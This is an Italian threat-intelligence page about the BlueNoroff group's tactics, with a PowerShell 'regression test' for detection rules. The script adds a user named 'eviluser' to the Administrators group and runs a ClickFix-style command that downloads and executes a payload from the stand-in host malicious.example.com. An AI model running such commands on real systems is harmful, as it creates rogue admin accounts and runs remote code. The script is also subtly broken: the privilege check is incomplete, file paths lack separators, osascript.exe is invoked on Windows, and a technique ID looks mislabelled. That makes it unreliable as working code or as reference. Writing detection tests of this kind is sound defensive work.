SOC Prime Bias: Critico

21 Jan 2026 15:58 UTC

BlueNoroff Gruppo: Il Braccio Finanziario del Cybercrimine di Lazarus

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Segui
BlueNoroff Gruppo: Il Braccio Finanziario del Cybercrimine di Lazarus
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Sommario

BlueNoroff è un sottogruppo finanziariamente orientato all’interno dell’ecosistema Lazarus che si concentra su operazioni di furto di alto valore contro banche, aziende di criptovaluta e obiettivi più ampi legati al Web3. Il playbook del gruppo comprende frodi abilitate da SWIFT, compromessi in modalità watering-hole, avvelenamenti della catena di fornitura di pacchetti Go e percorsi di intrusione su macOS costruiti attorno a false esche di “colloquio di lavoro”. Per raggiungere l’esecuzione e la persistenza, BlueNoroff combina uno stack malware modulare Rust/Go con AppleScript, VBScript e flussi di lavoro di ingegneria sociale progettati per aggirare l’attenzione degli utenti e integrarsi nel legittimo sviluppo e attività amministrativa.

Indagine

Il rapporto traccia la traiettoria di BlueNoroff dal colpo alla Banca del Bangladesh del 2016 fino alla più recente attività di compromissione della catena di fornitura del 2025, evidenziando come gli strumenti e i target dell’attore si siano ampliati insieme all’ecosistema crypto/Web3. I ricercatori descrivono i modelli di infrastruttura e catalogano componenti di malware tra cui GhostCall, GhostHire, RustBucket e GillyInjector. L’indagine mappa anche i comportamenti osservati su MITRE ATT&CK attraverso fasi come ricognizione e accesso iniziale, poi esecuzione, persistenza e furto di credenziali, sottolineando un constante focus su piede stabile, consegna di payload in fasi e percorsi di accesso pronti al furto.

Mitigazione

Riduci l’esposizione rafforzando l’igiene della catena di fornitura: valida i pacchetti prelevati da registry pubblici, applica controlli di pinning e provenienza e rivedi continuamente aggiornamenti delle dipendenze per modifiche inaspettate di manutentori o codici. Su macOS, rinforza la governance di LaunchAgent/LaunchDaemon e monitora le voci di persistenza sospette e strumenti non firmati. Blocca i domini doppelgänger usati per la consegna di esche, applica MFA per identità privilegiate e servizi esposti esternamente e rendi operative le rilevazioni per script, loader e tecniche di packing malevoli noti associate all’attore. Mantieni frequenti aggiornamenti di intelligence sulle minacce e rafforza la formazione degli utenti concentrata su modelli di ingegneria sociale di spear-phishing e “recruiter/colloquio di lavoro”.

Risposta

Se vengono scoperti indicatori BlueNoroff, isola gli host coinvolti e conserva le prove chiave, comprese tutte le linee di comando, il contenuto degli script e i binari o artefatti del pacchetto scaricati. Blocca i domini malevoli identificati e gli IP C2, quindi esegui i playbook di risposta agli incidenti allineati agli scenari di furto di credenziali e compromissione della catena di fornitura. Distribuisci o sintonizza le rilevazioni per catene di esecuzione AppleScript e VBScript e per modelli sospetti di PowerShell menzionati nel rapporto, quindi amplia la ricerca per identificare endpoint aggiuntivi esposti alla stessa esca, dipendenza o sovrapposizione di infrastruttura.

Flusso d’attacco

Esecuzione di Simulazione

Prerequisito: La Verifica Pre-volo di Telemetria e Baseline deve essere passata.

Razionale: Questa sezione dettaglia l’esatta esecuzione della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente le TTP identificate e mirare a generare la telemetria esatta attesa dalla logica di rilevamento. Esempi astratti o non correlati porteranno a diagnosi errate.

  • Narrazione & Comandi di Attacco:

    1. Esecuzione di AppleScript (T1546.016) – L’attaccante deposita un payload.scpt malevolo sull’endpoint (es. tramite un allegato di phishing). Utilizzando un osascript.exe preinstallato (incluso con uno strumento di terze parti), lanciano lo script per eseguire un payload PowerShell che aggiunge un nuovo account amministratore locale.
    2. Consegna alla Clipboard tramite ClickFix (T1204.004) – L’attaccante copia un comando creato per la clipboard che invoca curl con uno user-agent stile Zoom per scaricare un payload di seconda fase, quindi lo esegue immediatamente tramite cmd.exe. Il comando include anche una chiamata powershell.exe -c inline per eseguire il payload in memoria.
  • Script di Test di Regressione: Lo script seguente riproduce entrambi i comportamenti in modo deterministico.

    #----- BEGIN REGRESSION TEST SCRIPT -----
    # Assicurarsi di eseguire con privilegi amministrativi
    if (-not ([Security.Principal.WindowsPrincipal] `
        [Security.Principal.WindowsBuiltInRole] "Administrator")) {
        Write-Error "Esegui questo script come Amministratore."
        exit 1
    }
    
    # 1. Esecuzione di AppleScript tramite osascript.exe
    $appleScriptPath = "$env:TEMPmalicious.scpt"
    Set-Content -Path $appleScriptPath -Value @"
    tell application "System Events"
        do shell script "powershell -c `"Add-LocalGroupMember -Group 'Administrators' -Member 'eviluser'`""
    end tell
    "@
    # Esegui l'AppleScript
    Start-Process -FilePath "osascript.exe" -ArgumentList "`"$appleScriptPath`"" -NoNewWindow -Wait
    
    # 2. Consegna alla Clipboard stile ClickFix
    $clickFixCmd = 'curl -A "ZoomSDK" http://malicious.example.com/payload.exe -o $env:TEMPpayload.exe && powershell.exe -c "Start-Process $env:TEMPpayload.exe"'
    # Esegui tramite cmd.exe per corrispondere alla condizione della regola
    Start-Process -FilePath "cmd.exe" -ArgumentList "/c `$clickFixCmd" -NoNewWindow -Wait
    
    # Pulizia: rimuovi artefatti
    Remove-Item -Path $appleScriptPath -Force
    Remove-Item -Path "$env:TEMPpayload.exe" -Force -ErrorAction SilentlyContinue
    # End of script
    #----- END REGRESSION TEST SCRIPT -----
  • Comandi di Pulizia: Rimuovere eventuali processi, file e account utente di test rimanenti.

    # Interrompi eventuali processi rimanenti (difensivo – normalmente non necessario)
    Get-Process -Name "osascript","cmd","powershell","payload" -ErrorAction SilentlyContinue | Stop-Process -Force
    
    # Elimina file temporanei
    Remove-Item -Path "$env:TEMPmalicious.scpt" -Force -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:TEMPpayload.exe" -Force -ErrorAction SilentlyContinue
    
    # Rimuovi l'account admin di test se è stato creato
    if (Get-LocalUser -Name "eviluser" -ErrorAction SilentlyContinue) {
        Remove-LocalUser -Name "eviluser"
    }